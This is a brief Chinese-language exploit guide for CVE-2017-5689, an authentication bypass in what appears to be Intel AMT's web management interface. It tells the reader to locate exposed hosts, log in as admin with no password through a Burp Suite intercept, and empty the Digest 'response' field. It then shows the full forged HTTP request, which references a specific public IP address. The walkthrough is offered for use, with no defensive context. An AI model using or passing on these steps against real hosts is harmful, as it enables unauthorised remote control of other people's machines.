CVE-2017-5689

详细说明:https://secsb.com/2017/05/09/406.html

利用方式:查找主机

选择其中一个打开:

访问index.html

打开Burpsuite professional 的 proxy intercept 功能

输入信息:用户名 admin 密码空

修改response参数为空:点击intercept is on

GET /events.htm HTTP/1.1
Host: secsb.com:16992
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://128.193.45.41:16992/index.htm
Authorization: Digest username="admin", realm="Digest:CD8D0000000000000000000000000000", nonce="9id4BhMTAAAvLOpjZZDZILn+WhsK2F9+", uri="/events.htm", response="", qop=auth, nc=00000001, cnonce="a5377e261e801297"
Connection: close
Upgrade-Insecure-Requests: 1